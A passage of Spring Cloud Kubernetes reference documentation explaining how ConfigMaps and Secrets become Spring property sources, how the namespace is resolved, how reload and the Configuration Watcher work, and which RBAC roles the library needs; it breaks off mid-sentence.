config-map-two\n----\n====\n\nSuch a configuration will result in two properties being generated:\n\n - `greetings.message` equal to `Say Hello from one`.\n\n - `config-map-two.greetings.message` equal to `Say Hello from two`\n\nNotice that `spring.cloud.kubernetes.config.useNameAsPrefix` has a _lower_ priority than `spring.cloud.kubernetes.config.sources.useNameAsPrefix`.\nThis allows you to set a \"default\" strategy for all sources, at the same time allowing to override only a few.\n\nIf using the config map name is not an option, you can specify a different strategy, called : `explicitPrefix`. Since this is an _explicit_ prefix that\nyou select, it can only be supplied to the `sources` level. At the same time it has a higher priority than `useNameAsPrefix`. Let's suppose we have a third config map with these entries:\n\n\n====\n[source,yaml]\n----\nkind: ConfigMap\napiVersion: v1\nmetadata:\n name: config-map-three\ndata:\n application.yml: |-\n greeting:\n message: Say Hello from three\n----\n====\n\nA configuration like the one below:\n\n====\n[source,yaml]\n----\nspring:\n application:\n name: with-prefix\n cloud:\n kubernetes:\n config:\n useNameAsPrefix: true\n namespace: default-namespace\n sources:\n - name: config-map-one\n useNameAsPrefix: false\n - name: config-map-two\n explicitPrefix: two\n - name: config-map-three\n----\n====\n\nwill result in three properties being generated:\n\n - `greetings.message` equal to `Say Hello from one`.\n\n - `two.greetings.message` equal to `Say Hello from two`.\n\n - `config-map-three.greetings.message` equal to `Say Hello from three`.\n\nBy default, besides reading the config map that is specified in the `sources` configuration, Spring will also try to read\nall properties from \"profile aware\" sources. The easiest way to explain this is via an example. Let's suppose your application\nenables a profile called \"dev\" and you have a configuration like the one below:\n\n====\n[source,yaml]\n----\nspring:\n application:\n name: spring-k8s\n cloud:\n kubernetes:\n config:\n namespace: default-namespace\n sources:\n - name: config-map-one\n----\n====\n\nBesides reading the `config-map-one`, Spring will also try to read `config-map-one-dev`; in this particular order. Each active profile\ngenerates such a profile aware config map.\n\nThough your application should not be impacted by such a config map, it can be disabled if needed:\n\n====\n[source,yaml]\n----\nspring:\n application:\n name: spring-k8s\n cloud:\n kubernetes:\n config:\n includeProfileSpecificSources: false\n namespace: default-namespace\n sources:\n - name: config-map-one\n includeProfileSpecificSources: false\n----\n====\n\nNotice that just like before, there are two levels where you can specify this property: for all config maps or\nfor individual ones; the latter having a higher priority.\n\nNOTE: You should check the security configuration section. To access config maps from inside a pod you need to have the correct\nKubernetes service accounts, roles and role bindings.\n\nAnother option for using `ConfigMap` instances is to mount them into the Pod by running the Spring Cloud Kubernetes application\nand having Spring Cloud Kubernetes read them from the file system.\nThis behavior is controlled by the `spring.cloud.kubernetes.config.paths` property. You can use it in\naddition to or instead of the mechanism described earlier.\nYou can specify multiple (exact) file paths in `spring.cloud.kubernetes.config.paths` by using the `,` delimiter.\n\nNOTE: You have to provide the full exact path to each property file, because directories are not being recursively parsed.\n\nNOTE: If you use `spring.cloud.kubernetes.config.paths` or `spring.cloud.kubernetes.secrets.path` the automatic reload\nfunctionality will not work. You will need to make a `POST` request to the `\/actuator\/refresh` endpoint or\nrestart\/redeploy the application.\n\n[#config-map-fail-fast]\nIn some cases, your application may be unable to load some of your `ConfigMaps` using the Kubernetes API.\nIf you want your application to fail the start-up process in such cases, you can set\n`spring.cloud.kubernetes.config.fail-fast=true` to make the application start-up fail with an Exception.\n\n[#config-map-retry]\nYou can also make your application retry loading `ConfigMap` property sources on a failure. First, you need to\nset `spring.cloud.kubernetes.config.fail-fast=true`. Then you need to add `spring-retry`\nand `spring-boot-starter-aop` to your classpath. You can configure retry properties such as\nthe maximum number of attempts, backoff options like initial interval, multiplier, max interval by setting the\n`spring.cloud.kubernetes.config.retry.*` properties.\n\nNOTE: If you already have `spring-retry` and `spring-boot-starter-aop` on the classpath for some reason\nand want to enable fail-fast, but do not want retry to be enabled; you can disable retry for `ConfigMap` `PropertySources`\nby setting `spring.cloud.kubernetes.config.retry.enabled=false`.\n\n.Properties:\n[options=\"header,footer\"]\n|===\n| Name | Type | Default | Description\n| `spring.cloud.kubernetes.config.enabled` | `Boolean` | `true` | Enable ConfigMaps `PropertySource`\n| `spring.cloud.kubernetes.config.name` | `String` | `${spring.application.name}` | Sets the name of `ConfigMap` to look up\n| `spring.cloud.kubernetes.config.namespace` | `String` | Client namespace | Sets the Kubernetes namespace where to lookup\n| `spring.cloud.kubernetes.config.paths` | `List` | `null` | Sets the paths where `ConfigMap` instances are mounted\n| `spring.cloud.kubernetes.config.enableApi` | `Boolean` | `true` | Enable or disable consuming `ConfigMap` instances through APIs\n| `spring.cloud.kubernetes.config.fail-fast` | `Boolean` | `false` | Enable or disable failing the application start-up when an error occurred while loading a `ConfigMap`\n| `spring.cloud.kubernetes.config.retry.enabled` | `Boolean` | `true` | Enable or disable config retry.\n| `spring.cloud.kubernetes.config.retry.initial-interval` | `Long` | `1000` | Initial retry interval in milliseconds.\n| `spring.cloud.kubernetes.config.retry.max-attempts` | `Integer` | `6` | Maximum number of attempts.\n| `spring.cloud.kubernetes.config.retry.max-interval` | `Long` | `2000` | Maximum interval for backoff.\n| `spring.cloud.kubernetes.config.retry.multiplier` | `Double` | `1.1` | Multiplier for next interval.\n|===\n\n=== Secrets PropertySource\n\nKubernetes has the notion of https:\/\/kubernetes.io\/docs\/concepts\/configuration\/secret\/[Secrets] for storing\nsensitive data such as passwords, OAuth tokens, and so on. This project provides integration with `Secrets` to make secrets\naccessible by Spring Boot applications. You can explicitly enable or disable This feature by setting the `spring.cloud.kubernetes.secrets.enabled` property.\n\nWhen enabled, the `Fabric8SecretsPropertySource` looks up Kubernetes for `Secrets` from the following sources:\n\n. Reading recursively from secrets mounts\n. Named after the application (as defined by `spring.application.name`)\n. Matching some labels\n\n*Note:*\n\nBy default, consuming Secrets through the API (points 2 and 3 above) *is not enabled* for security reasons. The permission 'list' on secrets allows clients to inspect secrets values in the specified namespace.\nFurther, we recommend that containers share secrets through mounted volumes.\n\nIf you enable consuming Secrets through the API, we recommend that you limit access to Secrets by using an authorization policy, such as RBAC.\nFor more information about risks and best practices when consuming Secrets through the API refer to https:\/\/kubernetes.io\/docs\/concepts\/configuration\/secret\/#best-practices[this doc].\n\nIf the secrets are found, their data is made available to the application.\n\nAssume that we have a spring boot application named `demo` that uses properties to read its database\nconfiguration. We can create a Kubernetes secret by using the following command:\n\n====\n[source]\n----\nkubectl create secret generic db-secret --from-literal=username=user --from-literal=password=p455w0rd\n----\n====\n\nThe preceding command would create the following secret (which you can see by using `kubectl get secrets db-secret -o yaml`):\n\n====\n[source,yaml]\n----\napiVersion: v1\ndata:\n password: cDQ1NXcwcmQ=\n username: dXNlcg==\nkind: Secret\nmetadata:\n creationTimestamp: 2017-07-04T09:15:57Z\n name: db-secret\n namespace: default\n resourceVersion: \"357496\"\n selfLink: \/api\/v1\/namespaces\/default\/secrets\/db-secret\n uid: 63c89263-6099-11e7-b3da-76d6186905a8\ntype: Opaque\n----\n====\n\nNote that the data contains Base64-encoded versions of the literal provided by the `create` command.\n\nYour application can then use this secret -- for example, by exporting the secret's value as environment variables:\n\n====\n[source,yaml]\n----\napiVersion: v1\nkind: Deployment\nmetadata:\n name: ${project.artifactId}\nspec:\n template:\n spec:\n containers:\n - env:\n - name: DB_USERNAME\n valueFrom:\n secretKeyRef:\n name: db-secret\n key: username\n - name: DB_PASSWORD\n valueFrom:\n secretKeyRef:\n name: db-secret\n key: password\n----\n====\n\nYou can select the Secrets to consume in a number of ways:\n\n. By listing the directories where secrets are mapped:\n+\n====\n[source,bash]\n----\n-Dspring.cloud.kubernetes.secrets.paths=\/etc\/secrets\/db-secret,etc\/secrets\/postgresql\n----\n====\n+\nIf you have all the secrets mapped to a common root, you can set them like:\n+\n====\n[source,bash]\n----\n-Dspring.cloud.kubernetes.secrets.paths=\/etc\/secrets\n----\n====\n\n. By setting a named secret:\n+\n====\n[source,bash]\n----\n-Dspring.cloud.kubernetes.secrets.name=db-secret\n----\n====\n\n. By defining a list of labels:\n+\n====\n[source,bash]\n----\n-Dspring.cloud.kubernetes.secrets.labels.broker=activemq\n-Dspring.cloud.kubernetes.secrets.labels.db=postgresql\n----\n====\n\nAs the case with `ConfigMap`, more advanced configuration is also possible where you can use multiple `Secret`\ninstances. The `spring.cloud.kubernetes.secrets.sources` list makes this possible.\nFor example, you could define the following `Secret` instances:\n\n====\n[source,yaml]\n----\nspring:\n application:\n name: cloud-k8s-app\n cloud:\n kubernetes:\n secrets:\n name: default-name\n namespace: default-namespace\n sources:\n # Spring Cloud Kubernetes looks up a Secret named s1 in namespace default-namespace\n - name: s1\n # Spring Cloud Kubernetes looks up a Secret named default-name in namespace n2\n - namespace: n2\n # Spring Cloud Kubernetes looks up a Secret named s3 in namespace n3\n - namespace: n3\n name: s3\n----\n====\n\nIn the preceding example, if `spring.cloud.kubernetes.secrets.namespace` had not been set,\nthe `Secret` named `s1` would be looked up in the namespace that the application runs.\nSee <<namespace-resolution,namespace-resolution>> to get a better understanding of how the namespace\nof the application is resolved.\n\n<<config-map-fail-fast,Similar to the `ConfigMaps`>>; if you want your application to fail to start\nwhen it is unable to load `Secrets` property sources, you can set `spring.cloud.kubernetes.secrets.fail-fast=true`.\n\nIt is also possible to enable retry for `Secret` property sources <<config-map-retry,like the `ConfigMaps`>>.\nAs with the `ConfigMap` property sources, first you need to set `spring.cloud.kubernetes.secrets.fail-fast=true`.\nThen you need to add `spring-retry` and `spring-boot-starter-aop` to your classpath.\nRetry behavior of the `Secret` property sources can be configured by setting the `spring.cloud.kubernetes.secrets.retry.*`\nproperties.\n\nNOTE: If you already have `spring-retry` and `spring-boot-starter-aop` on the classpath for some reason\nand want to enable fail-fast, but do not want retry to be enabled; you can disable retry for `Secrets` `PropertySources`\nby setting `spring.cloud.kubernetes.secrets.retry.enabled=false`.\n\n.Properties:\n[options=\"header,footer\"]\n|===\n| Name | Type | Default | Description\n| `spring.cloud.kubernetes.secrets.enabled` | `Boolean` | `true` | Enable Secrets `PropertySource`\n| `spring.cloud.kubernetes.secrets.name` | `String` | `${spring.application.name}` | Sets the name of the secret to look up\n| `spring.cloud.kubernetes.secrets.namespace` | `String` | Client namespace | Sets the Kubernetes namespace where to look up\n| `spring.cloud.kubernetes.secrets.labels` | `Map` | `null` | Sets the labels used to lookup secrets\n| `spring.cloud.kubernetes.secrets.paths` | `List` | `null` | Sets the paths where secrets are mounted (example 1)\n| `spring.cloud.kubernetes.secrets.enableApi` | `Boolean` | `false` | Enables or disables consuming secrets through APIs (examples 2 and 3)\n| `spring.cloud.kubernetes.secrets.fail-fast` | `Boolean` | `false` | Enable or disable failing the application start-up when an error occurred while loading a `Secret`\n| `spring.cloud.kubernetes.secrets.retry.enabled` | `Boolean` | `true` | Enable or disable secrets retry.\n| `spring.cloud.kubernetes.secrets.retry.initial-interval` | `Long` | `1000` | Initial retry interval in milliseconds.\n| `spring.cloud.kubernetes.secrets.retry.max-attempts` | `Integer` | `6` | Maximum number of attempts.\n| `spring.cloud.kubernetes.secrets.retry.max-interval` | `Long` | `2000` | Maximum interval for backoff.\n| `spring.cloud.kubernetes.secrets.retry.multiplier` | `Double` | `1.1` | Multiplier for next interval.\n|===\n\nNotes:\n\n* The `spring.cloud.kubernetes.secrets.labels` property behaves as defined by\nhttps:\/\/github.com\/spring-projects\/spring-boot\/wiki\/Spring-Boot-Configuration-Binding#map-based-binding[Map-based binding].\n* The `spring.cloud.kubernetes.secrets.paths` property behaves as defined by\nhttps:\/\/github.com\/spring-projects\/spring-boot\/wiki\/Spring-Boot-Configuration-Binding#collection-based-binding[Collection-based binding].\n* Access to secrets through the API may be restricted for security reasons. The preferred way is to mount secrets to the Pod.\n\nYou can find an example of an application that uses secrets (though it has not been updated to use the new `spring-cloud-kubernetes` project) at\nhttps:\/\/github.com\/fabric8-quickstarts\/spring-boot-camel-config[spring-boot-camel-config]\n\n[[namespace-resolution]]\n=== Namespace resolution\nFinding an application namespace happens on a best-effort basis. There are some steps that we iterate in order\nto find it. The easiest and most common one, is to specify it in the proper configuration, for example:\n\n====\n[source,yaml]\n----\nspring:\n application:\n name: app\n cloud:\n kubernetes:\n secrets:\n name: secret\n namespace: default\n sources:\n # Spring Cloud Kubernetes looks up a Secret named 'a' in namespace 'default'\n - name: a\n # Spring Cloud Kubernetes looks up a Secret named 'secret' in namespace 'b'\n - namespace: b\n # Spring Cloud Kubernetes looks up a Secret named 'd' in namespace 'c'\n - namespace: c\n name: d\n----\n====\n\nRemember that the same can be done for config maps. If such a namespace is not specified, it will be read (in this order):\n\n1. from property `spring.cloud.kubernetes.client.namespace`\n2. from a String residing in a file denoted by `spring.cloud.kubernetes.client.serviceAccountNamespacePath` property\n3. from a String residing in `\/var\/run\/secrets\/kubernetes.io\/serviceaccount\/namespace` file\n(kubernetes default namespace path)\n4. from a designated client method call (for example fabric8's : `KubernetesClient::getNamespace`), if the client provides\nsuch a method. This, in turn, could be configured via environment properties. For example fabric8 client can be configured via\n\"KUBERNETES_NAMESPACE\" property; consult the client documentation for exact details.\n\nFailure to find a namespace from the above steps will result in an Exception being raised.\n\n=== `PropertySource` Reload\n\nWARNING: This functionality has been deprecated in the 2020.0 release. Please see\nthe <<spring-cloud-kubernetes-configuration-watcher>> controller for an alternative way\nto achieve the same functionality.\n\nSome applications may need to detect changes on external property sources and update their internal status to reflect the new configuration.\nThe reload feature of Spring Cloud Kubernetes is able to trigger an application reload when a related `ConfigMap` or\n`Secret` changes.\n\nBy default, this feature is disabled. You can enable it by using the `spring.cloud.kubernetes.reload.enabled=true` configuration property (for example, in the `application.properties` file).\n\nThe following levels of reload are supported (by setting the `spring.cloud.kubernetes.reload.strategy` property):\n\n* `refresh` (default): Only configuration beans annotated with `@ConfigurationProperties` or `@RefreshScope` are reloaded.\nThis reload level leverages the refresh feature of Spring Cloud Context.\n\n* `restart_context`: the whole Spring `ApplicationContext` is gracefully restarted. Beans are recreated with the new configuration.\nIn order for the restart context functionality to work properly you must enable and expose the restart actuator endpoint\n[source,yaml]\n====\n----\nmanagement:\n endpoint:\n restart:\n enabled: true\n endpoints:\n web:\n exposure:\n include: restart\n----\n====\n\n* `shutdown`: the Spring `ApplicationContext` is shut down to activate a restart of the container.\n When you use this level, make sure that the lifecycle of all non-daemon threads is bound to the `ApplicationContext`\nand that a replication controller or replica set is configured to restart the pod.\n\nAssuming that the reload feature is enabled with default settings (`refresh` mode), the following bean is refreshed when the config map changes:\n\n====\n[java, source]\n----\n@Configuration\n@ConfigurationProperties(prefix = \"bean\")\npublic class MyConfig {\n\n private String message = \"a message that can be changed live\";\n\n \/\/ getter and setters\n\n}\n----\n====\n\nTo see that changes effectively happen, you can create another bean that prints the message periodically, as follows\n\n====\n[source,java]\n----\n@Component\npublic class MyBean {\n\n @Autowired\n private MyConfig config;\n\n @Scheduled(fixedDelay = 5000)\n public void hello() {\n System.out.println(\"The message is: \" + config.getMessage());\n }\n}\n----\n====\n\nYou can change the message printed by the application by using a `ConfigMap`, as follows:\n\n====\n[source,yaml]\n----\napiVersion: v1\nkind: ConfigMap\nmetadata:\n name: reload-example\ndata:\n application.properties: |-\n bean.message=Hello World!\n----\n====\n\nAny change to the property named `bean.message` in the `ConfigMap` associated with the pod is reflected in the\noutput. More generally speaking, changes associated to properties prefixed with the value defined by the `prefix`\nfield of the `@ConfigurationProperties` annotation are detected and reflected in the application.\n<<configmap-propertysource,Associating a `ConfigMap` with a pod>> is explained earlier in this chapter.\n\nThe full example is available in https:\/\/github.com\/spring-cloud\/spring-cloud-kubernetes\/tree\/main\/spring-cloud-kubernetes-examples\/kubernetes-reload-example[`spring-cloud-kubernetes-reload-example`].\n\nThe reload feature supports two operating modes:\n* Event (default): Watches for changes in config maps or secrets by using the Kubernetes API (web socket).\nAny event produces a re-check on the configuration and, in case of changes, a reload.\nThe `view` role on the service account is required in order to listen for config map changes. A higher level role (such as `edit`) is required for secrets\n(by default, secrets are not monitored).\n* Polling: Periodically re-creates the configuration from config maps and secrets to see if it has changed.\nYou can configure the polling period by using the `spring.cloud.kubernetes.reload.period` property and defaults to 15 seconds.\nIt requires the same role as the monitored property source.\nThis means, for example, that using polling on file-mounted secret sources does not require particular privileges.\n\n.Properties:\n[options=\"header,footer\"]\n|===\n| Name | Type | Default | Description\n| `spring.cloud.kubernetes.reload.enabled` | `Boolean` | `false` | Enables monitoring of property sources and configuration reload\n| `spring.cloud.kubernetes.reload.monitoring-config-maps` | `Boolean` | `true` | Allow monitoring changes in config maps\n| `spring.cloud.kubernetes.reload.monitoring-secrets` | `Boolean` | `false` | Allow monitoring changes in secrets\n| `spring.cloud.kubernetes.reload.strategy` | `Enum` | `refresh` | The strategy to use when firing a reload (`refresh`, `restart_context`, or `shutdown`)\n| `spring.cloud.kubernetes.reload.mode` | `Enum` | `event` | Specifies how to listen for changes in property sources (`event` or `polling`)\n| `spring.cloud.kubernetes.reload.period` | `Duration`| `15s` | The period for verifying changes when using the `polling` strategy\n|===\n\nNotes:\n* You should not use properties under `spring.cloud.kubernetes.reload` in config maps or secrets. Changing such properties at runtime may lead to unexpected results.\n* Deleting a property or the whole config map does not restore the original state of the beans when you use the `refresh` level.\n\n== Kubernetes Ecosystem Awareness\n\nAll features described earlier in this guide work equally well, regardless of whether your application is running inside\nKubernetes. This is really helpful for development and troubleshooting.\nFrom a development point of view, this lets you start your Spring Boot application and debug one\nof the modules that is part of this project. You need not deploy it in Kubernetes,\nas the code of the project relies on the\nhttps:\/\/github.com\/fabric8io\/kubernetes-client[Fabric8 Kubernetes Java client], which is a fluent DSL that can\ncommunicate by using `http` protocol to the REST API of the Kubernetes Server.\n\nKubernetes awareness is based on Spring Boot API, specifically on https:\/\/docs.spring.io\/spring-boot\/docs\/current\/api\/org\/springframework\/boot\/autoconfigure\/condition\/ConditionalOnCloudPlatform.html[ConditionalOnCloudPlatform].\nThat property will auto-detect if your application is currently deployed in kubernetes or not. It is possible to override\nthat setting via `spring.main.cloud-platform`.\n\nFor example, if you need to test some features, but do not want to deploy to a cluster, it is enough to set the:\n`spring.main.cloud-platform=KUBERNETES`. This will make `spring-cloud-kubernetes` act as-if it is deployed in a real cluster.\nBe aware that when `spring-cloud-kubernetes-config` is on the classpath, `spring.main.cloud-platform` should be set in `bootstrap.{properties|yml}`\n(or the profile specific one), otherwise it should be in `application.{properties|yml}` (or the profile specific one).\nAlso note that these properties: `spring.cloud.kubernetes.config.enabled` and `spring.cloud.kubernetes.secrets.enabled`\nonly take effect when set in `bootstrap.{properties|yml}`.\n\n=== Breaking Changes In 3.0.x\n\nIn versions of Spring Cloud Kubernetes prior to `3.0.x`, Kubernetes awareness was implemented using `spring.cloud.kubernetes.enabled` property. This\nproperty was removed and is un-supported. Instead, we use Spring Boot API: https:\/\/docs.spring.io\/spring-boot\/docs\/current\/api\/org\/springframework\/boot\/autoconfigure\/condition\/ConditionalOnCloudPlatform.html[ConditionalOnCloudPlatform].\nIf it is needed to explicitly enable or disable this awareness, use `spring.main.cloud-platform=NONE\/KUBERNETES`.\n\n=== Kubernetes Profile Autoconfiguration\n\nWhen the application runs as a pod inside Kubernetes, a Spring profile named `kubernetes` automatically gets activated.\nThis lets you customize the configuration, to define beans that are applied when the Spring Boot application is deployed\nwithin the Kubernetes platform (for example, different development and production configuration).\n\n=== Istio Awareness\n\nWhen you include the `spring-cloud-kubernetes-fabric8-istio` module in the application classpath, a new profile is added to the application,\nprovided the application is running inside a Kubernetes Cluster with https:\/\/istio.io[Istio] installed. You can then use\nspring `@Profile(\"istio\")` annotations in your Beans and `@Configuration` classes.\n\nThe Istio awareness module uses `me.snowdrop:istio-client` to interact with Istio APIs, letting us discover traffic rules, circuit breakers, and so on,\nmaking it easy for our Spring Boot applications to consume this data to dynamically configure themselves according to the environment.\n\n== Pod Health Indicator\n\nSpring Boot uses https:\/\/github.com\/spring-projects\/spring-boot\/blob\/master\/spring-boot-project\/spring-boot-actuator\/src\/main\/java\/org\/springframework\/boot\/actuate\/health\/HealthEndpoint.java[`HealthIndicator`] to expose info about the health of an application.\nThat makes it really useful for exposing health-related information to the user and makes it a good fit for use as https:\/\/kubernetes.io\/docs\/tasks\/configure-pod-container\/configure-liveness-readiness-probes\/[readiness probes].\n\nThe Kubernetes health indicator (which is part of the core module) exposes the following info:\n\n* Pod name, IP address, namespace, service account, node name, and its IP address\n* A flag that indicates whether the Spring Boot application is internal or external to Kubernetes\n\nYou can disable this `HealthContributor` by setting `management.health.kubernetes.enabled`\nto `false` in `application.[properties | yaml]`.\n\n== Info Contributor\n\nSpring Cloud Kubernetes includes an `InfoContributor` which adds Pod information to\nSpring Boot's `\/info` Acturator endpoint.\n\nYou can disable this `InfoContributor` by setting `management.info.kubernetes.enabled`\nto `false` in `application.[properties | yaml]`.\n\n== Leader Election\nThe Spring Cloud Kubernetes leader election mechanism implements the leader election API of Spring Integration using a Kubernetes ConfigMap.\n\nMultiple application instances compete for leadership, but leadership will only be granted to one.\nWhen granted leadership, a leader application receives an `OnGrantedEvent` application event with leadership `Context`.\nApplications periodically attempt to gain leadership, with leadership granted to the first caller.\nA leader will remain a leader until either it is removed from the cluster, or it yields its leadership.\nWhen leadership removal occurs, the previous leader receives `OnRevokedEvent` application event.\nAfter removal, any instances in the cluster may become the new leader, including the old leader.\n\nTo include it in your project, add the following dependency.\n====\nFabric8 Leader Implementation\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-kubernetes-fabric8-leader<\/artifactId>\n<\/dependency>\n----\n====\n\nTo specify the name of the configmap used for leader election use the following property.\n====\n[source,properties]\n----\nspring.cloud.kubernetes.leader.config-map-name=leader\n----\n====\n\n== LoadBalancer for Kubernetes\nThis project includes Spring Cloud Load Balancer for load balancing based on Kubernetes Endpoints and provides implementation of load balancer based on Kubernetes Service.\nTo include it to your project add the following dependency.\n====\nFabric8 Implementation\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-fabric8-loadbalancer<\/artifactId>\n<\/dependency>\n----\n====\n\n====\nKubernetes Java Client Implementation\n[source,xml]\n----\n<dependency>\n <groupId>org.springframework.cloud<\/groupId>\n <artifactId>spring-cloud-starter-kubernetes-client-loadbalancer<\/artifactId>\n<\/dependency>\n----\n====\n\nTo enable load balancing based on Kubernetes Service name use the following property. Then load balancer would try to call application using address, for example `service-a.default.svc.cluster.local`\n====\n[source]\n----\nspring.cloud.kubernetes.loadbalancer.mode=SERVICE\n----\n====\n\nTo enabled load balancing across all namespaces use the following property. Property from `spring-cloud-kubernetes-discovery` module is respected.\n====\n[source]\n----\nspring.cloud.kubernetes.discovery.all-namespaces=true\n----\n====\n\nIf a service needs to be accessed over HTTPS you need to add a label or annotation to your service definition with the name `secured` and the value `true` and the load balancer will then use HTTPS to make requests to the service.\n\n== Security Configurations Inside Kubernetes\n\n\n=== Namespace\n\nMost of the components provided in this project need to know the namespace. For Kubernetes (1.3+), the namespace is made available to the pod as part of the service account secret and is automatically detected by the client.\nFor earlier versions, it needs to be specified as an environment variable to the pod. A quick way to do this is as follows:\n\n====\n[source]\n----\n env:\n - name: \"KUBERNETES_NAMESPACE\"\n valueFrom:\n fieldRef:\n fieldPath: \"metadata.namespace\"\n----\n====\n\n=== Service Account\n\nFor distributions of Kubernetes that support more fine-grained role-based access within the cluster, you need to make sure a pod that runs with `spring-cloud-kubernetes` has access to the Kubernetes API.\nFor any service accounts you assign to a deployment or pod, you need to make sure they have the correct roles.\n\nDepending on the requirements, you'll need `get`, `list` and `watch` permission on the following resources:\n\n.Kubernetes Resource Permissions\n|===\n|Dependency | Resources\n\n\n|spring-cloud-starter-kubernetes-fabric8\n|pods, services, endpoints\n\n|spring-cloud-starter-kubernetes-fabric8-config\n|configmaps, secrets\n\n|spring-cloud-starter-kubernetes-client\n|pods, services, endpoints\n\n|spring-cloud-starter-kubernetes-client-config\n|configmaps, secrets\n|===\n\nFor development purposes, you can add `cluster-reader` permissions to your `default` service account. On a production system you'll likely want to provide more granular permissions.\n\nThe following Role and RoleBinding are an example for namespaced permissions for the `default` account:\n\n====\n[source,yaml]\n----\nkind: Role\napiVersion: rbac.authorization.k8s.io\/v1\nmetadata:\n namespace: YOUR-NAME-SPACE\n name: namespace-reader\nrules:\n - apiGroups: [\"\"]\n resources: [\"configmaps\", \"pods\", \"services\", \"endpoints\", \"secrets\"]\n verbs: [\"get\", \"list\", \"watch\"]\n\n---\n\nkind: RoleBinding\napiVersion: rbac.authorization.k8s.io\/v1\nmetadata:\n name: namespace-reader-binding\n namespace: YOUR-NAME-SPACE\nsubjects:\n- kind: ServiceAccount\n name: default\n apiGroup: \"\"\nroleRef:\n kind: Role\n name: namespace-reader\n apiGroup: \"\"\n----\n====\n\n== Service Registry Implementation\n\nIn Kubernetes service registration is controlled by the platform, the application itself does not control\nregistration as it may do in other platforms. For this reason using `spring.cloud.service-registry.auto-registration.enabled`\nor setting `@EnableDiscoveryClient(autoRegister=false)` will have no effect in Spring Cloud Kubernetes.\n\n[#spring-cloud-kubernetes-configuration-watcher]\n## Spring Cloud Kubernetes Configuration Watcher\n\nKubernetes provides the ability to https:\/\/kubernetes.io\/docs\/tasks\/configure-pod-container\/configure-pod-configmap\/#add-configmap-data-to-a-volume[mount a ConfigMap or Secret as a volume]\nin the container of your application. When the contents of the ConfigMap or Secret changes, the https:\/\/kubernetes.io\/docs\/tasks\/configure-pod-container\/configure-pod-configmap\/#mounted-configmaps-are-updated-automatically[mounted volume will be updated with those changes].\n\nHowever, Spring Boot will not automatically update those changes unless you restart the application. Spring Cloud\nprovides the ability refresh the application context without restarting the application by either hitting the\nactuator endpoint `\/refresh` or via publishing a `RefreshRemoteApplicationEvent` using Spring Cloud Bus.\n\nTo achieve this configuration refresh of a Spring Cloud app running on Kubernetes, you can deploy the Spring Cloud\nKubernetes Configuration Watcher controller into your Kubernetes cluster.\n\nThe application is published as a container and is available on https:\/\/hub.docker.com\/r\/springcloud\/spring-cloud-kubernetes-configuration-watcher[Docker Hub].\n\nSpring Cloud Kubernetes Configuration Watcher can send refresh notifications to applications in two ways.\n\n1. Over HTTP in which case the application being notified must of the `\/refresh` actuator endpoint exposed and accessible from within the cluster\n2. Using Spring Cloud Bus, in which case you will need a message broker deployed to your custer for the application to use.\n\n### Deployment YAML\n\nBelow is a sample deployment YAML you can use to deploy the Kubernetes Configuration Watcher to Kubernetes.\n\n====\n[source,yaml]\n----\n---\napiVersion: v1\nkind: List\nitems:\n - apiVersion: v1\n kind: Service\n metadata:\n labels:\n app: spring-cloud-kubernetes-configuration-watcher\n name: spring-cloud-kubernetes-configuration-watcher\n spec:\n ports:\n - name: http\n port: 8888\n targetPort: 8888\n selector:\n app: spring-cloud-kubernetes-configuration-watcher\n type: ClusterIP\n - apiVersion: v1\n kind: ServiceAccount\n metadata:\n labels:\n app: spring-cloud-kubernetes-configuration-watcher\n name: spring-cloud-kubernetes-configuration-watcher\n - apiVersion: rbac.authorization.k8s.io\/v1\n kind: RoleBinding\n metadata:\n labels:\n app: spring-cloud-kubernetes-configuration-watcher\n name: spring-cloud-kubernetes-configuration-watcher:view\n roleRef:\n kind: Role\n apiGroup: rbac.authorization.k8s.io\n name: namespace-reader\n subjects:\n - kind: ServiceAccount\n name: spring-cloud-kubernetes-configuration-watcher\n - apiVersion: rbac.authorization.k8s.io\/v1\n kind: Role\n metadata:\n namespace: default\n name: namespace-reader\n rules:\n - apiGroups: [\"\", \"extensions\", \"apps\"]\n resources: [\"configmaps\", \"pods\", \"services\", \"endpoints\", \"secrets\"]\n verbs: [\"get\", \"list\", \"watch\"]\n - apiVersion: apps\/v1\n kind: Deployment\n metadata:\n name: spring-cloud-kubernetes-configuration-watcher-deployment\n spec:\n selector:\n matchLabels:\n app: spring-cloud-kubernetes-configuration-watcher\n template:\n metadata:\n labels:\n app: spring-cloud-kubernetes-configuration-watcher\n spec:\n serviceAccount: spring-cloud-kubernetes-configuration-watcher\n containers:\n - name: spring-cloud-kubernetes-configuration-watcher\n image: springcloud\/spring-cloud-kubernetes-configuration-watcher:2.0.1-SNAPSHOT\n imagePullPolicy: IfNotPresent\n readinessProbe:\n httpGet:\n port: 8888\n path: \/actuator\/health\/readiness\n livenessProbe:\n httpGet:\n port: 8888\n path: \/actuator\/health\/liveness\n ports:\n - containerPort: 8888\n\n----\n====\n\nThe Service Account and associated Role Binding is important for Spring Cloud Kubernetes Configuration to work properly.\nThe controller needs access to read data about ConfigMaps, Pods, Services, Endpoints and Secrets in the Kubernetes cluster.\n\n### Monitoring ConfigMaps and Secrets\n\nSpring Cloud Kubernetes Configuration Watcher will react to changes in ConfigMaps with a label of `spring.cloud.kubernetes.config` with the value `true`\nor any Secret with a label of `spring.cloud.kubernetes.secret` with the value `true`. If the ConfigMap or Secret does not have either of those labels\nor the values of those labels is not `true` then any changes will be ignored.\n\nThe labels Spring Cloud Kubernetes Configuration Watcher looks for on ConfigMaps and Secrets can be changed by setting\n`spring.cloud.kubernetes.configuration.watcher.configLabel` and `spring.cloud.kubernetes.configuration.watcher.secretLabel` respectively.\n\nIf a change is made to a ConfigMap or Secret with valid labels then Spring Cloud Kubernetes Configuration Watcher will take the name of the ConfigMap or Secret\nand send a notification to the application with that name.\n\n### HTTP Implementation\n\nThe HTTP implementation is what is used by default. When this implementation is used Spring Cloud Kubernetes Configuration Watcher and a\nchange to a ConfigMap or Secret occurs then the HTTP implementation will use the Spring Cloud Kubernetes Discovery Client to fetch all\ninstances of the application which match the name of the ConfigMap or Secret and send an HTTP POST request to the application's actuator\n`\/refresh` endpoint. By default it will send the post request to `\/actuator\/refresh` using the port registered in the discovery client.\n\n#### Non-Default Management Port and Actuator Path\n\nIf the application is using a non-default actuator path and\/or using a different port for the management endpoints, the Kubernetes service for the application\ncan add an annotation called `boot.spring.io\/actuator` and set its value to the path and port used by the application. For 